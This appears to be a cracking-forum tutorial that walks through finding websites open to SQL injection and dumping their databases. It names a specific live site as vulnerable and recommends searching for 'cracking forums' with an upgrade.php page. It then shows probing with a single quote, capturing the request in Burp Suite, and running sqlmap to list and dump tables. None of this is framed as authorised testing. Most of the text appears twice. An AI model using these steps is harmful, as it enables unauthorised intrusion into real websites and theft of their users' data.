OP 20 November, 2020 - 10:56 PM
Hey so today imma teach you how to find sql injection vulnerable websites
So the first thing we are going to search for is a website which has a upgrade.php page (I'd recommend looking for "cracking forums" as keywords and just change google pages until you find one).
Next, the first thing you wanna do is look for a claim code textbox.
Cracked.to in this case doesn't have one.
"sinfulsite.com" in this case is vulnerable to sql injection.
How do we know if it's sql injection vulnerable?
![[Image: wVWmr8q.png]](https://i.imgur.com/wVWmr8q.png)
As you can see here, there's the claim code textbox.
The next thing you are going to want to do is type a single ' in it.
Since the whole website might be pasted it will give a sql error.
This proves that it is Vulnerable.
![[Image: yuCjfIB.png]](https://i.imgur.com/yuCjfIB.png)
As you can read in the image, the ' we typed shows up at the query.
We now can proceed to using sqlmap. If you don't know how to use sqlmap i will soon make a tutorial on it but for now just stick to the tutorial.
There's a page on the official kali linux website on how to install the subsystem on windows 10.
https://www.kali.org/tutorials/kali-on-t...for-linux/
Follow the steps on that tutorial, then after you've got it all set up.
You are going to want to use sqlmap.
Load up burp suite.
Then go to the proxy tab. Disable intercepting which comes already enabled by default and go to windows proxy settings.
![[Image: HGUWB5F.jpg]](https://i.imgur.com/HGUWB5F.jpg)
Set the address to 127.0.0.1 and the port to 8080.
Save it.
Then go to burp. And open the proxy tab again.
![[Image: J6vfmpo.jpg]](https://i.imgur.com/J6vfmpo.jpg)
Should look like this.
Afterwards, toggle the intercept button, go back to the website, type a random word and press on sumbit. This should keep your stuck refreshing.
You'll see on the tab of burp that there's the action there.
Press on send to repeater and now you're safe to stop the proxy.
![[Image: IwfkuzQ.jpg]](https://i.imgur.com/IwfkuzQ.jpg)
Next you want to go to the tab named repeater and right click on the text, and save item as cookies.txt
Next, you want to go to C:\Users\(user)\AppData\Local\Packages\KaliLinux.(numbers)
When you find that folder go inside LocalState\rootfs\root\ and drag the file you saved earlier there.
IGNORE THE REST OF ITEMS OF THE FOLDER (or otherwise you might fail at this)
So now with the commands. I'll leave all the list under this line:
[INFO] parsing HTTP request from 'cookies.txt'
custom injection marker (''') found in POST body. Do you want to process it? [Y/n/q]
Press Y
After it will say:
[INFO] resuming back-end DBMS 'mysql'
[INFO] testing connection to the target URL
got a 302 redirect to 'https://sinfulsite.com:443/upgrade.php?action=redeemfailed'. Do you want to follow? [Y/n]
Press N
Now you'll get the names of the dbs that they are using.
Next thing you want to do is listing the tables and dumping those you want.
use
3. sqlmap -r cookies.txt --tables
Repeat the same process as before with the Y/N
And in few seconds you'll get the list with all the tables.
If you don't know how databases work I'd recommend reading this article:
https://www.ntchosting.com/encyclopedia/...-language/
Next up, you want to check those tables you're interested in and dump them
How?
Find the table you want on the list you just got, and use the following command:
4. sqlmap -r cookies.txt -T (the name of the table) --dump
And finally, you are done.
Wait a few minutes/hours and you'll have the results of the dumped table.
So the first thing we are going to search for is a website which has a upgrade.php page (I'd recommend looking for "cracking forums" as keywords and just change google pages until you find one).
Next, the first thing you wanna do is look for a claim code textbox.
Cracked.to in this case doesn't have one.
"sinfulsite.com" in this case is vulnerable to sql injection.
How do we know if it's sql injection vulnerable?
As you can see here, there's the claim code textbox.
The next thing you are going to want to do is type a single ' in it.
Since the whole website might be pasted it will give a sql error.
This proves that it is Vulnerable.
As you can read in the image, the ' we typed shows up at the query.
We now can proceed to using sqlmap. If you don't know how to use sqlmap i will soon make a tutorial on it but for now just stick to the tutorial.
There's a page on the official kali linux website on how to install the subsystem on windows 10.
https://www.kali.org/tutorials/kali-on-t...for-linux/
Follow the steps on that tutorial, then after you've got it all set up.
Quote:First you're going to run sudo -iYou will put the password you typed at the start.
You are going to want to use sqlmap.
Quote:To see if you have it installed use sqlmap -hThen, you'll need burp suite, doesn't matter if it's a cracked version of it.
Load up burp suite.
Then go to the proxy tab. Disable intercepting which comes already enabled by default and go to windows proxy settings.
Set the address to 127.0.0.1 and the port to 8080.
Save it.
Then go to burp. And open the proxy tab again.
Should look like this.Afterwards, toggle the intercept button, go back to the website, type a random word and press on sumbit. This should keep your stuck refreshing.
You'll see on the tab of burp that there's the action there.
Press on send to repeater and now you're safe to stop the proxy.
Next you want to go to the tab named repeater and right click on the text, and save item as cookies.txt
Next, you want to go to C:\Users\(user)\AppData\Local\Packages\KaliLinux.(numbers)
When you find that folder go inside LocalState\rootfs\root\ and drag the file you saved earlier there.
IGNORE THE REST OF ITEMS OF THE FOLDER (or otherwise you might fail at this)
So now with the commands. I'll leave all the list under this line:
- ls
- sqlmap -r cookies.txt
[INFO] parsing HTTP request from 'cookies.txt'
custom injection marker (''') found in POST body. Do you want to process it? [Y/n/q]
Press Y
After it will say:
[INFO] resuming back-end DBMS 'mysql'
[INFO] testing connection to the target URL
got a 302 redirect to 'https://sinfulsite.com:443/upgrade.php?action=redeemfailed'. Do you want to follow? [Y/n]
Press N
Now you'll get the names of the dbs that they are using.
Next thing you want to do is listing the tables and dumping those you want.
use
3. sqlmap -r cookies.txt --tables
Repeat the same process as before with the Y/N
And in few seconds you'll get the list with all the tables.
If you don't know how databases work I'd recommend reading this article:
https://www.ntchosting.com/encyclopedia/...-language/
Next up, you want to check those tables you're interested in and dump them
How?
Find the table you want on the list you just got, and use the following command:
4. sqlmap -r cookies.txt -T (the name of the table) --dump
And finally, you are done.
Wait a few minutes/hours and you'll have the results of the dumped table.